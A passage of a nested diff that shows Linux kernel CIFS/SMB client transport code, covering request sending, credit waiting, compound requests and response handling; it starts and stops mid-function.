+-smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+-	      struct smb_rqst *rqst, int flags)
+-{
+-	struct kvec iov;
+-	struct smb2_transform_hdr *tr_hdr;
+-	struct smb_rqst cur_rqst[MAX_COMPOUND];
+-	int rc;
+-
+-	if (!(flags & CIFS_TRANSFORM_REQ))
+-		return __smb_send_rqst(server, num_rqst, rqst);
+-
+-	if (num_rqst > MAX_COMPOUND - 1)
+-		return -ENOMEM;
+-
+-	if (!server->ops->init_transform_rq) {
+-		cifs_server_dbg(VFS, "Encryption requested but transform callback is missing\n");
+-		return -EIO;
+-	}
+-
+-	tr_hdr = kzalloc(sizeof(*tr_hdr), GFP_NOFS);
+-	if (!tr_hdr)
+-		return -ENOMEM;
+-
+-	memset(&cur_rqst[0], 0, sizeof(cur_rqst));
+-	memset(&iov, 0, sizeof(iov));
+-
+-	iov.iov_base = tr_hdr;
+-	iov.iov_len = sizeof(*tr_hdr);
+-	cur_rqst[0].rq_iov = &iov;
+-	cur_rqst[0].rq_nvec = 1;
+-
+-	rc = server->ops->init_transform_rq(server, num_rqst + 1,
+-					    &cur_rqst[0], rqst);
+-	if (rc)
+-		goto out;
+-
+-	rc = __smb_send_rqst(server, num_rqst + 1, &cur_rqst[0]);
+-	smb3_free_compound_rqst(num_rqst, &cur_rqst[1]);
+-out:
+-	kfree(tr_hdr);
+-	return rc;
+-}
+-
+-int
+-smb_send(struct TCP_Server_Info *server, struct smb_hdr *smb_buffer,
+-	 unsigned int smb_buf_length)
+-{
+-	struct kvec iov[2];
+-	struct smb_rqst rqst = { .rq_iov = iov,
+-				 .rq_nvec = 2 };
+-
+-	iov[0].iov_base = smb_buffer;
+-	iov[0].iov_len = 4;
+-	iov[1].iov_base = (char *)smb_buffer + 4;
+-	iov[1].iov_len = smb_buf_length;
+-
+-	return __smb_send_rqst(server, 1, &rqst);
+-}
+-
+-static int
+-wait_for_free_credits(struct TCP_Server_Info *server, const int num_credits,
+-		      const int timeout, const int flags,
+-		      unsigned int *instance)
+-{
+-	long rc;
+-	int *credits;
+-	int optype;
+-	long int t;
+-	int scredits, in_flight;
+-
+-	if (timeout < 0)
+-		t = MAX_JIFFY_OFFSET;
+-	else
+-		t = msecs_to_jiffies(timeout);
+-
+-	optype = flags & CIFS_OP_MASK;
+-
+-	*instance = 0;
+-
+-	credits = server->ops->get_credits_field(server, optype);
+-	/* Since an echo is already inflight, no need to wait to send another */
+-	if (*credits <= 0 && optype == CIFS_ECHO_OP)
+-		return -EAGAIN;
+-
+-	spin_lock(&server->req_lock);
+-	if ((flags & CIFS_TIMEOUT_MASK) == CIFS_NON_BLOCKING) {
+-		/* oplock breaks must not be held up */
+-		server->in_flight++;
+-		if (server->in_flight > server->max_in_flight)
+-			server->max_in_flight = server->in_flight;
+-		*credits -= 1;
+-		*instance = server->reconnect_instance;
+-		scredits = *credits;
+-		in_flight = server->in_flight;
+-		spin_unlock(&server->req_lock);
+-
+-		trace_smb3_nblk_credits(server->CurrentMid,
+-				server->conn_id, server->hostname, scredits, -1, in_flight);
+-		cifs_dbg(FYI, "%s: remove %u credits total=%d\n",
+-				__func__, 1, scredits);
+-
+-		return 0;
+-	}
+-
+-	while (1) {
+-		if (*credits < num_credits) {
+-			scredits = *credits;
+-			spin_unlock(&server->req_lock);
+-
+-			cifs_num_waiters_inc(server);
+-			rc = wait_event_killable_timeout(server->request_q,
+-				has_credits(server, credits, num_credits), t);
+-			cifs_num_waiters_dec(server);
+-			if (!rc) {
+-				spin_lock(&server->req_lock);
+-				scredits = *credits;
+-				in_flight = server->in_flight;
+-				spin_unlock(&server->req_lock);
+-
+-				trace_smb3_credit_timeout(server->CurrentMid,
+-						server->conn_id, server->hostname, scredits,
+-						num_credits, in_flight);
+-				cifs_server_dbg(VFS, "wait timed out after %d ms\n",
+-						timeout);
+-				return -EBUSY;
+-			}
+-			if (rc == -ERESTARTSYS)
+-				return -ERESTARTSYS;
+-			spin_lock(&server->req_lock);
+-		} else {
+-			spin_unlock(&server->req_lock);
+-
+-			spin_lock(&server->srv_lock);
+-			if (server->tcpStatus == CifsExiting) {
+-				spin_unlock(&server->srv_lock);
+-				return -ENOENT;
+-			}
+-			spin_unlock(&server->srv_lock);
+-
+-			/*
+-			 * For normal commands, reserve the last MAX_COMPOUND
+-			 * credits to compound requests.
+-			 * Otherwise these compounds could be permanently
+-			 * starved for credits by single-credit requests.
+-			 *
+-			 * To prevent spinning CPU, block this thread until
+-			 * there are >MAX_COMPOUND credits available.
+-			 * But only do this is we already have a lot of
+-			 * credits in flight to avoid triggering this check
+-			 * for servers that are slow to hand out credits on
+-			 * new sessions.
+-			 */
+-			spin_lock(&server->req_lock);
+-			if (!optype && num_credits == 1 &&
+-			    server->in_flight > 2 * MAX_COMPOUND &&
+-			    *credits <= MAX_COMPOUND) {
+-				spin_unlock(&server->req_lock);
+-
+-				cifs_num_waiters_inc(server);
+-				rc = wait_event_killable_timeout(
+-					server->request_q,
+-					has_credits(server, credits,
+-						    MAX_COMPOUND + 1),
+-					t);
+-				cifs_num_waiters_dec(server);
+-				if (!rc) {
+-					spin_lock(&server->req_lock);
+-					scredits = *credits;
+-					in_flight = server->in_flight;
+-					spin_unlock(&server->req_lock);
+-
+-					trace_smb3_credit_timeout(
+-							server->CurrentMid,
+-							server->conn_id, server->hostname,
+-							scredits, num_credits, in_flight);
+-					cifs_server_dbg(VFS, "wait timed out after %d ms\n",
+-							timeout);
+-					return -EBUSY;
+-				}
+-				if (rc == -ERESTARTSYS)
+-					return -ERESTARTSYS;
+-				spin_lock(&server->req_lock);
+-				continue;
+-			}
+-
+-			/*
+-			 * Can not count locking commands against total
+-			 * as they are allowed to block on server.
+-			 */
+-
+-			/* update # of requests on the wire to server */
+-			if ((flags & CIFS_TIMEOUT_MASK) != CIFS_BLOCKING_OP) {
+-				*credits -= num_credits;
+-				server->in_flight += num_credits;
+-				if (server->in_flight > server->max_in_flight)
+-					server->max_in_flight = server->in_flight;
+-				*instance = server->reconnect_instance;
+-			}
+-			scredits = *credits;
+-			in_flight = server->in_flight;
+-			spin_unlock(&server->req_lock);
+-
+-			trace_smb3_waitff_credits(server->CurrentMid,
+-					server->conn_id, server->hostname, scredits,
+-					-(num_credits), in_flight);
+-			cifs_dbg(FYI, "%s: remove %u credits total=%d\n",
+-					__func__, num_credits, scredits);
+-			break;
+-		}
+-	}
+-	return 0;
+-}
+-
+-static int
+-wait_for_free_request(struct TCP_Server_Info *server, const int flags,
+-		      unsigned int *instance)
+-{
+-	return wait_for_free_credits(server, 1, -1, flags,
+-				     instance);
+-}
+-
+-static int
+-wait_for_compound_request(struct TCP_Server_Info *server, int num,
+-			  const int flags, unsigned int *instance)
+-{
+-	int *credits;
+-	int scredits, in_flight;
+-
+-	credits = server->ops->get_credits_field(server, flags & CIFS_OP_MASK);
+-
+-	spin_lock(&server->req_lock);
+-	scredits = *credits;
+-	in_flight = server->in_flight;
+-
+-	if (*credits < num) {
+-		/*
+-		 * If the server is tight on resources or just gives us less
+-		 * credits for other reasons (e.g. requests are coming out of
+-		 * order and the server delays granting more credits until it
+-		 * processes a missing mid) and we exhausted most available
+-		 * credits there may be situations when we try to send
+-		 * a compound request but we don't have enough credits. At this
+-		 * point the client needs to decide if it should wait for
+-		 * additional credits or fail the request. If at least one
+-		 * request is in flight there is a high probability that the
+-		 * server will return enough credits to satisfy this compound
+-		 * request.
+-		 *
+-		 * Return immediately if no requests in flight since we will be
+-		 * stuck on waiting for credits.
+-		 */
+-		if (server->in_flight == 0) {
+-			spin_unlock(&server->req_lock);
+-			trace_smb3_insufficient_credits(server->CurrentMid,
+-					server->conn_id, server->hostname, scredits,
+-					num, in_flight);
+-			cifs_dbg(FYI, "%s: %d requests in flight, needed %d total=%d\n",
+-					__func__, in_flight, num, scredits);
+-			return -EDEADLK;
+-		}
+-	}
+-	spin_unlock(&server->req_lock);
+-
+-	return wait_for_free_credits(server, num, 60000, flags,
+-				     instance);
+-}
+-
+-int
+-cifs_wait_mtu_credits(struct TCP_Server_Info *server, unsigned int size,
+-		      unsigned int *num, struct cifs_credits *credits)
+-{
+-	*num = size;
+-	credits->value = 0;
+-	credits->instance = server->reconnect_instance;
+-	return 0;
+-}
+-
+-static int allocate_mid(struct cifs_ses *ses, struct smb_hdr *in_buf,
+-			struct mid_q_entry **ppmidQ)
+-{
+-	spin_lock(&ses->ses_lock);
+-	if (ses->ses_status == SES_NEW) {
+-		if ((in_buf->Command != SMB_COM_SESSION_SETUP_ANDX) &&
+-			(in_buf->Command != SMB_COM_NEGOTIATE)) {
+-			spin_unlock(&ses->ses_lock);
+-			return -EAGAIN;
+-		}
+-		/* else ok - we are setting up session */
+-	}
+-
+-	if (ses->ses_status == SES_EXITING) {
+-		/* check if SMB session is bad because we are setting it up */
+-		if (in_buf->Command != SMB_COM_LOGOFF_ANDX) {
+-			spin_unlock(&ses->ses_lock);
+-			return -EAGAIN;
+-		}
+-		/* else ok - we are shutting down session */
+-	}
+-	spin_unlock(&ses->ses_lock);
+-
+-	*ppmidQ = alloc_mid(in_buf, ses->server);
+-	if (*ppmidQ == NULL)
+-		return -ENOMEM;
+-	spin_lock(&ses->server->mid_lock);
+-	list_add_tail(&(*ppmidQ)->qhead, &ses->server->pending_mid_q);
+-	spin_unlock(&ses->server->mid_lock);
+-	return 0;
+-}
+-
+-static int
+-wait_for_response(struct TCP_Server_Info *server, struct mid_q_entry *midQ)
+-{
+-	int error;
+-
+-	error = wait_event_state(server->response_q,
+-				 midQ->mid_state != MID_REQUEST_SUBMITTED,
+-				 (TASK_KILLABLE|TASK_FREEZABLE_UNSAFE));
+-	if (error < 0)
+-		return -ERESTARTSYS;
+-
+-	return 0;
+-}
+-
+-struct mid_q_entry *
+-cifs_setup_async_request(struct TCP_Server_Info *server, struct smb_rqst *rqst)
+-{
+-	int rc;
+-	struct smb_hdr *hdr = (struct smb_hdr *)rqst->rq_iov[0].iov_base;
+-	struct mid_q_entry *mid;
+-
+-	if (rqst->rq_iov[0].iov_len != 4 ||
+-	    rqst->rq_iov[0].iov_base + 4 != rqst->rq_iov[1].iov_base)
+-		return ERR_PTR(-EIO);
+-
+-	/* enable signing if server requires it */
+-	if (server->sign)
+-		hdr->Flags2 |= SMBFLG2_SECURITY_SIGNATURE;
+-
+-	mid = alloc_mid(hdr, server);
+-	if (mid == NULL)
+-		return ERR_PTR(-ENOMEM);
+-
+-	rc = cifs_sign_rqst(rqst, server, &mid->sequence_number);
+-	if (rc) {
+-		release_mid(mid);
+-		return ERR_PTR(rc);
+-	}
+-
+-	return mid;
+-}
+-
+-/*
+- * Send a SMB request and set the callback function in the mid to handle
+- * the result. Caller is responsible for dealing with timeouts.
+- */
+-int
+-cifs_call_async(struct TCP_Server_Info *server, struct smb_rqst *rqst,
+-		mid_receive_t *receive, mid_callback_t *callback,
+-		mid_handle_t *handle, void *cbdata, const int flags,
+-		const struct cifs_credits *exist_credits)
+-{
+-	int rc;
+-	struct mid_q_entry *mid;
+-	struct cifs_credits credits = { .value = 0, .instance = 0 };
+-	unsigned int instance;
+-	int optype;
+-
+-	optype = flags & CIFS_OP_MASK;
+-
+-	if ((flags & CIFS_HAS_CREDITS) == 0) {
+-		rc = wait_for_free_request(server, flags, &instance);
+-		if (rc)
+-			return rc;
+-		credits.value = 1;
+-		credits.instance = instance;
+-	} else
+-		instance = exist_credits->instance;
+-
+-	cifs_server_lock(server);
+-
+-	/*
+-	 * We can't use credits obtained from the previous session to send this
+-	 * request. Check if there were reconnects after we obtained credits and
+-	 * return -EAGAIN in such cases to let callers handle it.
+-	 */
+-	if (instance != server->reconnect_instance) {
+-		cifs_server_unlock(server);
+-		add_credits_and_wake_if(server, &credits, optype);
+-		return -EAGAIN;
+-	}
+-
+-	mid = server->ops->setup_async_request(server, rqst);
+-	if (IS_ERR(mid)) {
+-		cifs_server_unlock(server);
+-		add_credits_and_wake_if(server, &credits, optype);
+-		return PTR_ERR(mid);
+-	}
+-
+-	mid->receive = receive;
+-	mid->callback = callback;
+-	mid->callback_data = cbdata;
+-	mid->handle = handle;
+-	mid->mid_state = MID_REQUEST_SUBMITTED;
+-
+-	/* put it on the pending_mid_q */
+-	spin_lock(&server->mid_lock);
+-	list_add_tail(&mid->qhead, &server->pending_mid_q);
+-	spin_unlock(&server->mid_lock);
+-
+-	/*
+-	 * Need to store the time in mid before calling I/O. For call_async,
+-	 * I/O response may come back and free the mid entry on another thread.
+-	 */
+-	cifs_save_when_sent(mid);
+-	rc = smb_send_rqst(server, 1, rqst, flags);
+-
+-	if (rc < 0) {
+-		revert_current_mid(server, mid->credits);
+-		server->sequence_number -= 2;
+-		delete_mid(mid);
+-	}
+-
+-	cifs_server_unlock(server);
+-
+-	if (rc == 0)
+-		return 0;
+-
+-	add_credits_and_wake_if(server, &credits, optype);
+-	return rc;
+-}
+-
+-/*
+- *
+- * Send an SMB Request.  No response info (other than return code)
+- * needs to be parsed.
+- *
+- * flags indicate the type of request buffer and how long to wait
+- * and whether to log NT STATUS code (error) before mapping it to POSIX error
+- *
+- */
+-int
+-SendReceiveNoRsp(const unsigned int xid, struct cifs_ses *ses,
+-		 char *in_buf, int flags)
+-{
+-	int rc;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov;
+-	int resp_buf_type;
+-
+-	iov[0].iov_base = in_buf;
+-	iov[0].iov_len = get_rfc1002_length(in_buf) + 4;
+-	flags |= CIFS_NO_RSP_BUF;
+-	rc = SendReceive2(xid, ses, iov, 1, &resp_buf_type, flags, &rsp_iov);
+-	cifs_dbg(NOISY, "SendRcvNoRsp flags %d rc %d\n", flags, rc);
+-
+-	return rc;
+-}
+-
+-static int
+-cifs_sync_mid_result(struct mid_q_entry *mid, struct TCP_Server_Info *server)
+-{
+-	int rc = 0;
+-
+-	cifs_dbg(FYI, "%s: cmd=%d mid=%llu state=%d\n",
+-		 __func__, le16_to_cpu(mid->command), mid->mid, mid->mid_state);
+-
+-	spin_lock(&server->mid_lock);
+-	switch (mid->mid_state) {
+-	case MID_RESPONSE_RECEIVED:
+-		spin_unlock(&server->mid_lock);
+-		return rc;
+-	case MID_RETRY_NEEDED:
+-		rc = -EAGAIN;
+-		break;
+-	case MID_RESPONSE_MALFORMED:
+-		rc = -EIO;
+-		break;
+-	case MID_SHUTDOWN:
+-		rc = -EHOSTDOWN;
+-		break;
+-	default:
+-		if (!(mid->mid_flags & MID_DELETED)) {
+-			list_del_init(&mid->qhead);
+-			mid->mid_flags |= MID_DELETED;
+-		}
+-		cifs_server_dbg(VFS, "%s: invalid mid state mid=%llu state=%d\n",
+-			 __func__, mid->mid, mid->mid_state);
+-		rc = -EIO;
+-	}
+-	spin_unlock(&server->mid_lock);
+-
+-	release_mid(mid);
+-	return rc;
+-}
+-
+-static inline int
+-send_cancel(struct TCP_Server_Info *server, struct smb_rqst *rqst,
+-	    struct mid_q_entry *mid)
+-{
+-	return server->ops->send_cancel ?
+-				server->ops->send_cancel(server, rqst, mid) : 0;
+-}
+-
+-int
+-cifs_check_receive(struct mid_q_entry *mid, struct TCP_Server_Info *server,
+-		   bool log_error)
+-{
+-	unsigned int len = get_rfc1002_length(mid->resp_buf) + 4;
+-
+-	dump_smb(mid->resp_buf, min_t(u32, 92, len));
+-
+-	/* convert the length into a more usable form */
+-	if (server->sign) {
+-		struct kvec iov[2];
+-		int rc = 0;
+-		struct smb_rqst rqst = { .rq_iov = iov,
+-					 .rq_nvec = 2 };
+-
+-		iov[0].iov_base = mid->resp_buf;
+-		iov[0].iov_len = 4;
+-		iov[1].iov_base = (char *)mid->resp_buf + 4;
+-		iov[1].iov_len = len - 4;
+-		/* FIXME: add code to kill session */
+-		rc = cifs_verify_signature(&rqst, server,
+-					   mid->sequence_number);
+-		if (rc)
+-			cifs_server_dbg(VFS, "SMB signature verification returned error = %d\n",
+-				 rc);
+-	}
+-
+-	/* BB special case reconnect tid and uid here? */
+-	return map_and_check_smb_error(mid, log_error);
+-}
+-
+-struct mid_q_entry *
+-cifs_setup_request(struct cifs_ses *ses, struct TCP_Server_Info *ignored,
+-		   struct smb_rqst *rqst)
+-{
+-	int rc;
+-	struct smb_hdr *hdr = (struct smb_hdr *)rqst->rq_iov[0].iov_base;
+-	struct mid_q_entry *mid;
+-
+-	if (rqst->rq_iov[0].iov_len != 4 ||
+-	    rqst->rq_iov[0].iov_base + 4 != rqst->rq_iov[1].iov_base)
+-		return ERR_PTR(-EIO);
+-
+-	rc = allocate_mid(ses, hdr, &mid);
+-	if (rc)
+-		return ERR_PTR(rc);
+-	rc = cifs_sign_rqst(rqst, ses->server, &mid->sequence_number);
+-	if (rc) {
+-		delete_mid(mid);
+-		return ERR_PTR(rc);
+-	}
+-	return mid;
+-}
+-
+-static void
+-cifs_compound_callback(struct mid_q_entry *mid)
+-{
+-	struct TCP_Server_Info *server = mid->server;
+-	struct cifs_credits credits;
+-
+-	credits.value = server->ops->get_credits(mid);
+-	credits.instance = server->reconnect_instance;
+-
+-	add_credits(server, &credits, mid->optype);
+-}
+-
+-static void
+-cifs_compound_last_callback(struct mid_q_entry *mid)
+-{
+-	cifs_compound_callback(mid);
+-	cifs_wake_up_task(mid);
+-}
+-
+-static void
+-cifs_cancelled_callback(struct mid_q_entry *mid)
+-{
+-	cifs_compound_callback(mid);
+-	release_mid(mid);
+-}
+-
+-/*
+- * Return a channel (master if none) of @ses that can be used to send
+- * regular requests.
+- *
+- * If we are currently binding a new channel (negprot/sess.setup),
+- * return the new incomplete channel.
+- */
+-struct TCP_Server_Info *cifs_pick_channel(struct cifs_ses *ses)
+-{
+-	uint index = 0;
+-
+-	if (!ses)
+-		return NULL;
+-
+-	/* round robin */
+-	index = (uint)atomic_inc_return(&ses->chan_seq);
+-
+-	spin_lock(&ses->chan_lock);
+-	index %= ses->chan_count;
+-	spin_unlock(&ses->chan_lock);
+-
+-	return ses->chans[index].server;
+-}
+-
+-int
+-compound_send_recv(const unsigned int xid, struct cifs_ses *ses,
+-		   struct TCP_Server_Info *server,
+-		   const int flags, const int num_rqst, struct smb_rqst *rqst,
+-		   int *resp_buf_type, struct kvec *resp_iov)
+-{
+-	int i, j, optype, rc = 0;
+-	struct mid_q_entry *midQ[MAX_COMPOUND];
+-	bool cancelled_mid[MAX_COMPOUND] = {false};
+-	struct cifs_credits credits[MAX_COMPOUND] = {
+-		{ .value = 0, .instance = 0 }
+-	};
+-	unsigned int instance;
+-	char *buf;
+-
+-	optype = flags & CIFS_OP_MASK;
+-
+-	for (i = 0; i < num_rqst; i++)
+-		resp_buf_type[i] = CIFS_NO_BUFFER;  /* no response buf yet */
+-
+-	if (!ses || !ses->server || !server) {
+-		cifs_dbg(VFS, "Null session\n");
+-		return -EIO;
+-	}
+-
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus == CifsExiting) {
+-		spin_unlock(&server->srv_lock);
+-		return -ENOENT;
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	/*
+-	 * Wait for all the requests to become available.
+-	 * This approach still leaves the possibility to be stuck waiting for
+-	 * credits if the server doesn't grant credits to the outstanding
+-	 * requests and if the client is completely idle, not generating any
+-	 * other requests.
+-	 * This can be handled by the eventual session reconnect.
+-	 */
+-	rc = wait_for_compound_request(server, num_rqst, flags,
+-				       &instance);
+-	if (rc)
+-		return rc;
+-
+-	for (i = 0; i < num_rqst; i++) {
+-		credits[i].value = 1;
+-		credits[i].instance = instance;
+-	}
+-
+-	/*
+-	 * Make sure that we sign in the same order that we send on this socket
+-	 * and avoid races inside tcp sendmsg code that could cause corruption
+-	 * of smb data.
+-	 */
+-
+-	cifs_server_lock(server);
+-
+-	/*
+-	 * All the parts of the compound chain belong obtained credits from the
+-	 * same session. We can not use credits obtained from the previous
+-	 * session to send this request. Check if there were reconnects after
+-	 * we obtained credits and return -EAGAIN in such cases to let callers
+-	 * handle it.
+-	 */
+-	if (instance != server->reconnect_instance) {
+-		cifs_server_unlock(server);
+-		for (j = 0; j < num_rqst; j++)
+-			add_credits(server, &credits[j], optype);
+-		return -EAGAIN;
+-	}
+-
+-	for (i = 0; i < num_rqst; i++) {
+-		midQ[i] = server->ops->setup_request(ses, server, &rqst[i]);
+-		if (IS_ERR(midQ[i])) {
+-			revert_current_mid(server, i);
+-			for (j = 0; j < i; j++)
+-				delete_mid(midQ[j]);
+-			cifs_server_unlock(server);
+-
+-			/* Update # of requests on wire to server */
+-			for (j = 0; j < num_rqst; j++)
+-				add_credits(server, &credits[j], optype);
+-			return PTR_ERR(midQ[i]);
+-		}
+-
+-		midQ[i]->mid_state = MID_REQUEST_SUBMITTED;
+-		midQ[i]->optype = optype;
+-		/*
+-		 * Invoke callback for every part of the compound chain
+-		 * to calculate credits properly. Wake up this thread only when
+-		 * the last element is received.
+-		 */
+-		if (i < num_rqst - 1)
+-			midQ[i]->callback = cifs_compound_callback;
+-		else
+-			midQ[i]->callback = cifs_compound_last_callback;
+-	}
+-	rc = smb_send_rqst(server, num_rqst, rqst, flags);
+-
+-	for (i = 0; i < num_rqst; i++)
+-		cifs_save_when_sent(midQ[i]);
+-
+-	if (rc < 0) {
+-		revert_current_mid(server, num_rqst);
+-		server->sequence_number -= 2;
+-	}
+-
+-	cifs_server_unlock(server);
+-
+-	/*
+-	 * If sending failed for some reason or it is an oplock break that we
+-	 * will not receive a response to - return credits back
+-	 */
+-	if (rc < 0 || (flags & CIFS_NO_SRV_RSP)) {
+-		for (i = 0; i < num_rqst; i++)
+-			add_credits(server, &credits[i], optype);
+-		goto out;
+-	}
+-
+-	/*
+-	 * At this point the request is passed to the network stack - we assume
+-	 * that any credits taken from the server structure on the client have
+-	 * been spent and we can't return them back. Once we receive responses
+-	 * we will collect credits granted by the server in the mid callbacks
+-	 * and add those credits to the server structure.
+-	 */
+-
+-	/*
+-	 * Compounding is never used during session establish.
+-	 */
+-	spin_lock(&ses->ses_lock);
+-	if ((ses->ses_status == SES_NEW) || (optype & CIFS_NEG_OP) || (optype & CIFS_SESS_OP)) {
+-		spin_unlock(&ses->ses_lock);
+-
+-		cifs_server_lock(server);
+-		smb311_update_preauth_hash(ses, server, rqst[0].rq_iov, rqst[0].rq_nvec);
+-		cifs_server_unlock(server);
+-
+-		spin_lock(&ses->ses_lock);
+-	}
+-	spin_unlock(&ses->ses_lock);
+-
+-	for (i = 0; i < num_rqst; i++) {
+-		rc = wait_for_response(server, midQ[i]);
+-		if (rc != 0)
+-			break;
+-	}
+-	if (rc != 0) {
+-		for (; i < num_rqst; i++) {
+-			cifs_server_dbg(FYI, "Cancelling wait for mid %llu cmd: %d\n",
+-				 midQ[i]->mid, le16_to_cpu(midQ[i]->command));
+-			send_cancel(server, &rqst[i], midQ[i]);
+-			spin_lock(&server->mid_lock);
+-			midQ[i]->mid_flags |= MID_WAIT_CANCELLED;
+-			if (midQ[i]->mid_state == MID_REQUEST_SUBMITTED) {
+-				midQ[i]->callback = cifs_cancelled_callback;
+-				cancelled_mid[i] = true;
+-				credits[i].value = 0;
+-			}
+-			spin_unlock(&server->mid_lock);
+-		}
+-	}
+-
+-	for (i = 0; i < num_rqst; i++) {
+-		if (rc < 0)
+-			goto out;
+-
+-		rc = cifs_sync_mid_result(midQ[i], server);
+-		if (rc != 0) {
+-			/* mark this mid as cancelled to not free it below */
+-			cancelled_mid[i] = true;
+-			goto out;
+-		}
+-
+-		if (!midQ[i]->resp_buf ||
+-		    midQ[i]->mid_state != MID_RESPONSE_RECEIVED) {
+-			rc = -EIO;
+-			cifs_dbg(FYI, "Bad MID state?\n");
+-			goto out;
+-		}
+-
+-		buf = (char *)midQ[i]->resp_buf;
+-		resp_iov[i].iov_base = buf;
+-		resp_iov[i].iov_len = midQ[i]->resp_buf_size +
+-			HEADER_PREAMBLE_SIZE(server);
+-
+-		if (midQ[i]->large_buf)
+-			resp_buf_type[i] = CIFS_LARGE_BUFFER;
+-		else
+-			resp_buf_type[i] = CIFS_SMALL_BUFFER;
+-
+-		rc = server->ops->check_receive(midQ[i], server,
+-						     flags & CIFS_LOG_ERROR);
+-
+-		/* mark it so buf will not be freed by delete_mid */
+-		if ((flags & CIFS_NO_RSP_BUF) == 0)
+-			midQ[i]->resp_buf = NULL;
+-
+-	}
+-
+-	/*
+-	 * Compounding is never used during session establish.
+-	 */
+-	spin_lock(&ses->ses_lock);
+-	if ((ses->ses_status == SES_NEW) || (optype & CIFS_NEG_OP) || (optype & CIFS_SESS_OP)) {
+-		struct kvec iov = {
+-			.iov_base = resp_iov[0].iov_base,
+-			.iov_len = resp_iov[0].iov_len
+-		};
+-		spin_unlock(&ses->ses_lock);
+-		cifs_server_lock(server);
+-		smb311_update_preauth_hash(ses, server, &iov, 1);
+-		cifs_server_unlock(server);
+-		spin_lock(&ses->ses_lock);
+-	}
+-	spin_unlock(&ses->ses_lock);
+-
+-out:
+-	/*
+-	 * This will dequeue all mids. After this it is important that the
+-	 * demultiplex_thread will not process any of these mids any futher.
+-	 * This is prevented above by using a noop callback that will not
+-	 * wake this thread except for the very last PDU.
+-	 */
+-	for (i = 0; i < num_rqst; i++) {
+-		if (!cancelled_mid[i])
+-			delete_mid(midQ[i]);
+-	}
+-
+-	return rc;
+-}
+-
+-int
+-cifs_send_recv(const unsigned int xid, struct cifs_ses *ses,
+-	       struct TCP_Server_Info *server,
+-	       struct smb_rqst *rqst, int *resp_buf_type, const int flags,
+-	       struct kvec *resp_iov)
+-{
+-	return compound_send_recv(xid, ses, server, flags, 1,
+-				  rqst, resp_buf_type, resp_iov);
+-}
+-
+-int
+-SendReceive2(const unsigned int xid, struct cifs_ses *ses,
+-	     struct kvec *iov, int n_vec, int *resp_buf_type /* ret */,
+-	     const int flags, struct kvec *resp_iov)
+-{
+-	struct smb_rqst rqst;
+-	struct kvec s_iov[CIFS_MAX_IOV_SIZE], *new_iov;
+-	int rc;
+-
+-	if (n_vec + 1 > CIFS_MAX_IOV_SIZE) {
+-		new_iov = kmalloc_array(n_vec + 1, sizeof(struct kvec),
+-					GFP_KERNEL);
+-		if (!new_iov) {
+-			/* otherwise cifs_send_recv below sets resp_buf_type */
+-			*resp_buf_type = CIFS_NO_BUFFER;
+-			return -ENOMEM;
+-		}
+-	} else
+-		new_iov = s_iov;
+-
+-	/* 1st iov is a RFC1001 length followed by the rest of the packet */
+-	memcpy(new_iov + 1, iov, (sizeof(struct kvec) * n_vec));
+-
+-	new_iov[0].iov_base = new_iov[1].iov_base;
+-	new_iov[0].iov_len = 4;
+-	new_iov[1].iov_base += 4;
+-	new_iov[1].iov_len -= 4;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = new_iov;
+-	rqst.rq_nvec = n_vec + 1;
+-
+-	rc = cifs_send_recv(xid, ses, ses->server,
+-			    &rqst, resp_buf_type, flags, resp_iov);
+-	if (n_vec + 1 > CIFS_MAX_IOV_SIZE)
+-		kfree(new_iov);
+-	return rc;
+-}
+-
+-int
+-SendReceive(const unsigned int xid, struct cifs_ses *ses,
+-	    struct smb_hdr *in_buf, struct smb_hdr *out_buf,
+-	    int *pbytes_returned, const int flags)
+-{
+-	int rc = 0;
+-	struct mid_q_entry *midQ;
+-	unsigned int len = be32_to_cpu(in_buf->smb_buf_length);
+-	struct kvec iov = { .iov_base = in_buf, .iov_len = len };
+-	struct smb_rqst rqst = { .rq_iov = &iov, .rq_nvec = 1 };
+-	struct cifs_credits credits = { .value = 1, .instance = 0 };
+-	struct TCP_Server_Info *server;
+-
+-	if (ses == NULL) {
+-		cifs_dbg(VFS, "Null smb session\n");
+-		return -EIO;
+-	}
+-	server = ses->server;
+-	if (server == NULL) {
+-		cifs_dbg(VFS, "Null tcp session\n");
+-		return -EIO;
+-	}
+-
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus == CifsExiting) {
+-		spin_unlock(&server->srv_lock);
+-		return -ENOENT;
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	/* Ensure that we do not send more than 50 overlapping requests
+-	   to the same server. We may make this configurable later or
+-	   use ses->maxReq */
+-
+-	if (len > CIFSMaxBufSize + MAX_CIFS_HDR_SIZE - 4) {
+-		cifs_server_dbg(VFS, "Invalid length, greater than maximum frame, %d\n",
+-				len);
+-		return -EIO;
+-	}
+-
+-	rc = wait_for_free_request(server, flags, &credits.instance);
+-	if (rc)
+-		return rc;
+-
+-	/* make sure that we sign in the same order that we send on this socket
+-	   and avoid races inside tcp sendmsg code that could cause corruption
+-	   of smb data */
+-
+-	cifs_server_lock(server);
+-
+-	rc = allocate_mid(ses, in_buf, &midQ);
+-	if (rc) {
+-		cifs_server_unlock(server);
+-		/* Update # of requests on wire to server */
+-		add_credits(server, &credits, 0);
+-		return rc;
+-	}
+-
+-	rc = cifs_sign_smb(in_buf, server, &midQ->sequence_number);
+-	if (rc) {
+-		cifs_server_unlock(server);
+-		goto out;
+-	}
+-
+-	midQ->mid_state = MID_REQUEST_SUBMITTED;
+-
+-	rc = smb_send(server, in_buf, len);
+-	cifs_save_when_sent(midQ);
+-
+-	if (rc < 0)
+-		server->sequence_number -= 2;
+-
+-	cifs_server_unlock(server);
+-
+-	if (rc < 0)
+-		goto out;
+-
+-	rc = wait_for_response(server, midQ);
+-	if (rc != 0) {
+-		send_cancel(server, &rqst, midQ);
+-		spin_lock(&server->mid_lock);
+-		if (midQ->mid_state == MID_REQUEST_SUBMITTED) {
+-			/* no longer considered to be "in-flight" */
+-			midQ->callback = release_mid;
+-			spin_unlock(&server->mid_lock);
+-			add_credits(server, &credits, 0);
+-			return rc;
+-		}
+-		spin_unlock(&server->mid_lock);
+-	}
+-
+-	rc = cifs_sync_mid_result(midQ, server);
+-	if (rc != 0) {
+-		add_credits(server, &credits, 0);
+-		return rc;
+-	}
+-
